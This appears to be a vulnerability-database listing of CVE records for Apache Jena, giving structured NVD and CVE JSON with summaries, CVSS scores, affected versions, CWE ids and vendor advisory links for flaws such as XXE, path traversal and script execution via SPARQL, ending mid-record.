Search criteria
18 vulnerabilities found for jena by apache
FKIE_CVE-2025-50151
Vulnerability from fkie_nvd - Published: 2025-07-21 10:15 - Updated: 2025-11-04 22:16
Summary
File access paths in configuration files uploaded by users with administrator access are not validated.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2C804A9-87A4-4936-9F6B-F84CEB5B2580",
"versionEndExcluding": "5.5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "File access paths in configuration files uploaded by users with administrator access are not validated.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload."
},
{
"lang": "es",
"value": "Las rutas de acceso a los archivos de configuraci\u00f3n cargados por usuarios con acceso de administrador no se validan. Este problema afecta a Apache Jena hasta la versi\u00f3n 5.4.0. Se recomienda actualizar a la versi\u00f3n 5.5.0, que no permite la carga de configuraciones arbitrarias."
}
],
"id": "CVE-2025-50151",
"lastModified": "2025-11-04T22:16:20.113",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2025-07-21T10:15:25.837",
"references": [
{
"source": "security@apache.org",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/12gks5z40gh9bszn1xk8mz34gz586xss"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/2"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2025-49656
Vulnerability from fkie_nvd - Published: 2025-07-21 10:15 - Updated: 2025-11-04 22:16
Summary
Users with administrator access can create database files outside the files area of the Fuseki server.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which fixes the issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2C804A9-87A4-4936-9F6B-F84CEB5B2580",
"versionEndExcluding": "5.5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Users with administrator access can create databases files outside the files area of the Fuseki server.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which fixes the issue."
},
{
"lang": "es",
"value": "Los usuarios con acceso de administrador pueden crear archivos de bases de datos fuera del \u00e1rea de archivos del servidor Fuseki. Este problema afecta a Apache Jena hasta la versi\u00f3n 5.4.0. Se recomienda actualizar a la versi\u00f3n 5.5.0, que soluciona el problema."
}
],
"id": "CVE-2025-49656",
"lastModified": "2025-11-04T22:16:18.450",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2025-07-21T10:15:25.440",
"references": [
{
"source": "security@apache.org",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/qmm21som8zct813vx6dfd1phnfro6mwq"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/1"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2023-32200
Vulnerability from fkie_nvd - Published: 2023-07-12 08:15 - Updated: 2024-11-21 08:02
Severity
- 8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- 8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Summary
There are insufficient restrictions on called script functions in Apache Jena versions 4.8.0 and earlier. This allows a remote user to execute JavaScript via a SPARQL query.
This issue affects Apache Jena: from 3.7.0 through 4.8.0.
References
| Source | URL | Tags |
|---|---|---|
| security@apache.org | https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z | Mailing List, Third Party Advisory |
| security@apache.org | https://www.cve.org/CVERecord?id=CVE-2023-22665 | Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z | Mailing List, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.cve.org/CVERecord?id=CVE-2023-22665 | Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16650542-BB5B-4572-862A-B3122A20D882",
"versionEndIncluding": "4.8.0",
"versionStartIncluding": "3.7.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "There is insufficient restrictions of called script functions in Apache Jena\n versions 4.8.0 and earlier. It allows a \nremote user to execute javascript via a SPARQL query.\nThis issue affects Apache Jena: from 3.7.0 through 4.8.0.\n\n"
}
],
"id": "CVE-2023-32200",
"lastModified": "2024-11-21T08:02:53.243",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2023-07-12T08:15:10.070",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
},
{
"source": "security@apache.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-917"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2023-22665
Vulnerability from fkie_nvd - Published: 2023-04-25 07:15 - Updated: 2024-11-21 07:45
Summary
There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query.
References
| Source | URL | Tags |
|---|---|---|
| security@apache.org | http://www.openwall.com/lists/oss-security/2023/07/11/11 | Mailing List, Third Party Advisory |
| security@apache.org | https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s | Issue Tracking, Mailing List |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2023/07/11/11 | Mailing List, Third Party Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s | Issue Tracking, Mailing List |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16650542-BB5B-4572-862A-B3122A20D882",
"versionEndIncluding": "4.8.0",
"versionStartIncluding": "3.7.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query."
}
],
"id": "CVE-2023-22665",
"lastModified": "2024-11-21T07:45:09.793",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-04-25T07:15:08.137",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
},
{
"source": "security@apache.org",
"tags": [
"Issue Tracking",
"Mailing List"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mailing List"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-917"
}
],
"source": "security@apache.org",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-917"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2022-28890
Vulnerability from fkie_nvd - Published: 2022-05-05 09:15 - Updated: 2024-11-21 06:58
Summary
A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.
References
| Source | URL | Tags |
|---|---|---|
| security@apache.org | https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878 | Mailing List, Vendor Advisory |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878 | Mailing List, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:4.4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BECFCBB8-D1E4-4413-86EB-FDD040601A4F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities."
},
{
"lang": "es",
"value": "Una vulnerabilidad en el analizador RDF/X de Apache Jena permite a un atacante causar la recuperaci\u00f3n de un DTD externo. Este problema afecta a Apache Jena versi\u00f3n 4.4.0 y a las versiones anteriores. Apache Jena versiones 4.2.x y 4.3.x no permiten entidades externas"
}
],
"id": "CVE-2022-28890",
"lastModified": "2024-11-21T06:58:08.750",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2022-05-05T09:15:08.140",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-611"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-39239
Vulnerability from fkie_nvd - Published: 2021-09-16 15:15 - Updated: 2024-11-21 06:18
Summary
A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*",
"matchCriteriaId": "188EB99D-6136-4B07-AE15-268D100A2039",
"versionEndIncluding": "4.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server."
},
{
"lang": "es",
"value": "Una vulnerabilidad en el procesamiento de XML en Apache Jena, en versiones hasta la 4.1.0, puede permitir a un atacante ejecutar un ataque de tipo XML External Entities (XXE), incluyendo la exposici\u00f3n del contenido de archivos locales a un servidor remoto"
}
],
"id": "CVE-2021-39239",
"lastModified": "2024-11-21T06:18:59.310",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-09-16T15:15:07.527",
"references": [
{
"source": "security@apache.org",
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"source": "security@apache.org",
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
},
{
"source": "security@apache.org",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-611"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2025-50151 (GCVE-0-2025-50151)
Vulnerability from cvelistv5 – Published: 2025-07-21 09:32 – Updated: 2025-11-04 21:11
Title
Apache Jena: Configuration files uploaded by administrative users are not checked properly
Summary
File access paths in configuration files uploaded by users with administrator access are not validated.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.
Severity
No CVSS data available.
CWE
- CWE-20
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Jena | Affected: 0, ≤ 5.4.0 (semver) |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-50151",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-21T14:40:14.417556Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T14:41:06.294Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:11:34.502Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "5.4.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003eFile access paths in configuration files uploaded by users with administrator access are not validated.\u003c/div\u003e\u003cdiv\u003e\u003cp\u003eThis issue affects Apache Jena version up to 5.4.0.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload.\u003c/p\u003e\u003cbr\u003e\u003c/div\u003e"
}
],
"value": "File access paths in configuration files uploaded by users with administrator access are not validated.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which does not allow arbitrary configuration upload."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T09:32:30.334Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/12gks5z40gh9bszn1xk8mz34gz586xss"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache Jena: Configuration files uploaded by administrative users are not check properly",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-50151",
"datePublished": "2025-07-21T09:32:30.334Z",
"dateReserved": "2025-06-13T16:13:26.895Z",
"dateUpdated": "2025-11-04T21:11:34.502Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-49656 (GCVE-0-2025-49656)
Vulnerability from cvelistv5 – Published: 2025-07-21 09:30 – Updated: 2025-11-04 21:11
Title
Apache Jena: Administrative users can create files outside the server directory space via the admin UI
Summary
Users with administrator access can create database files outside the files area of the Fuseki server.
This issue affects Apache Jena version up to 5.4.0.
Users are recommended to upgrade to version 5.5.0, which fixes the issue.
Severity
No CVSS data available.
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Jena | Affected: 0, ≤ 5.4.0 (semver) |
Credits
Noriaki Iwasaki; Cyber Defense Institute, Inc
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-49656",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-21T14:46:28.661133Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T14:47:08.462Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:11:14.792Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/07/21/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "5.4.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Noriaki Iwasaki; Cyber Defense Institute, Inc"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eUsers with administrator access can create databases files outside the files area of the Fuseki server.\u003c/p\u003e\u003cp\u003eThis issue affects Apache Jena version up to 5.4.0.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 5.5.0, which fixes the issue.\u003c/p\u003e"
}
],
"value": "Users with administrator access can create databases files outside the files area of the Fuseki server.\n\nThis issue affects Apache Jena version up to 5.4.0.\n\nUsers are recommended to upgrade to version 5.5.0, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T09:30:32.715Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/qmm21som8zct813vx6dfd1phnfro6mwq"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache Jena: Administrative users can create files outside the server directory space via the admin UI",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-49656",
"datePublished": "2025-07-21T09:30:32.715Z",
"dateReserved": "2025-06-09T16:47:05.868Z",
"dateUpdated": "2025-11-04T21:11:14.792Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2023-32200 (GCVE-0-2023-32200)
Vulnerability from cvelistv5 – Published: 2023-07-12 07:49 – Updated: 2024-10-07 19:42
Title
Apache Jena: Exposure of execution in script engine expressions.
Summary
There are insufficient restrictions on called script functions in Apache Jena versions 4.8.0 and earlier. This allows a remote user to execute JavaScript via a SPARQL query.
This issue affects Apache Jena: from 3.7.0 through 4.8.0.
Severity
No CVSS data available.
CWE
- CWE-917 - Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Jena | Affected: 3.7.0, ≤ 4.8.0 (semver) |
Credits
s3gundo of Alibaba
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T15:10:23.901Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"related",
"x_transferred"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
},
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "jena",
"vendor": "apache",
"versions": [
{
"lessThanOrEqual": "4.8.0",
"status": "affected",
"version": "3.7.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-32200",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-07T19:41:36.847404Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
